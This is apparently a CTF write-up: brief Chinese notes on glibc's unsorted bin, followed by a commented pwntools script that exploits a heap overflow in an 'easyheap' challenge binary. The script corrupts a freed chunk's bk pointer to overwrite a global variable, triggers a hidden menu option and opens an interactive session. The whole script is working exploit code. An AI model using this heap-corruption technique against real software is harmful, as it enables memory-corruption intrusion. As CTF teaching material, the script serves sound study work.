unsorted bin attack
Unsorted Bin 双向循环链表,先进先出
如果unsorted bin中只有一个chunk的话,chunk的fd、bk指针都指向main_arena+偏移:
https://mp.weixin.qq.com/s/1KhiulR-webHsBZhUzQzKg
https://blog.csdn.net/qq_36495104/article/details/106246762
from pwn import *
import sys
import time
#context.log_level='debug'
#p=process("./easyheap")
# Hard-coded CTF target; swap for the commented-out process("./easyheap") line
# above to run the same script against a local copy of the binary.
p=remote("redirect.do-not-trust.hacking.run",10413)
# Parsed for symbol/section lookups, but `e` is not referenced anywhere in the
# visible script.
e=ELF("./easyheap")
#context.terminal=["gnome-terminal","-x","sh","-c"]
#gdb.attach(p)
def create(size, content):
    """Drive menu option 1 ("create") of the target: allocate `size` bytes and fill them with `content`.

    Uses the module-level tube `p`; the menu prompts are answered in the order the
    remote presents them, and `size` is sent as decimal text.
    """
    dialogue = (
        ("Your choice :", "1"),
        ("Size of Heap : ", str(size)),
        ("Content of heap:", content),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def edit(index, size, content):
    """Drive menu option 2 ("edit") of the target: rewrite chunk `index` with `size` bytes of `content`.

    Uses the module-level tube `p`. NOTE(review): the remote apparently accepts a
    `size` larger than the chunk's original allocation (the script later edits a
    0x10 chunk with 0x30 bytes) — that missing bound check is the heap overflow
    the rest of the script depends on; confirm against the binary.
    """
    dialogue = (
        ("Your choice :", "2"),
        ("Index :", str(index)),
        ("Size of Heap : ", str(size)),
        ("Content of heap : ", content),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def delete(index):
    """Drive menu option 3 ("delete") of the target: free the chunk at `index`.

    Uses the module-level tube `p`; `index` is sent as decimal text.
    """
    dialogue = (
        ("Your choice :", "3"),
        ("Index :", str(index)),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
# Attack parameters. `magic` is an absolute address, so the binary is presumably
# non-PIE; it is the location the unsorted-bin unlink below will write to.
# NOTE(review): looks like the global that the hidden menu option checks — confirm
# against the binary.
fd=0
magic=0x6020c0
#start to attack
# Layout: chunk 0 (0x10 user bytes) sits directly below chunk 1 (0x80), and
# chunk 2 (0x80) follows so that freeing chunk 1 does not merge it into top.
create(0x10,"a"*0x10)
create(0x80,"b"*0x80)
create(0x80,"c"*0x80)
# Free chunk 1. A 0x90-byte chunk is expected to land in the unsorted bin here;
# this assumes a pre-tcache glibc (< 2.26) — TODO confirm the target's libc.
delete(1)
# Overflow from chunk 0 into chunk 1's header: 0x18 bytes of filler (0x10 user
# data + the 8-byte prev_size field), then chunk 1's size (0x91 keeps the
# original size and PREV_INUSE bit), then fd, then bk = magic - 0x10 so that
# chunk1->bk->fd is exactly `magic`.
payload="d"*0x18+p64(0x91)+p64(fd)+p64(magic-0x10)
# Root cause being exploited: edit() takes a new size (0x30) larger than chunk 0's
# original 0x10 allocation and writes the whole payload. The defensive fix is to
# bound the edit by the size recorded at allocation time.
edit(0,0x30,payload)
# Allocating 0x80 again hands chunk 1 back from the unsorted bin; the unlink
# step (bck->fd = unsorted_chunks(av)) writes a main_arena address over `magic`,
# which is the whole effect of an unsorted-bin attack. glibc >= 2.29 verifies
# bck->fd == victim before this unlink, so the technique fails there — verify
# for the target libc.
create(0x80,"aaa")
# Presumably the hidden menu option that checks `magic`. The ":" anchor is loose:
# it matches the first ':' still pending on the tube, so this relies on the
# preceding create() having consumed all of its own prompts.
p.sendlineafter(":",str(4869))
p.interactive()
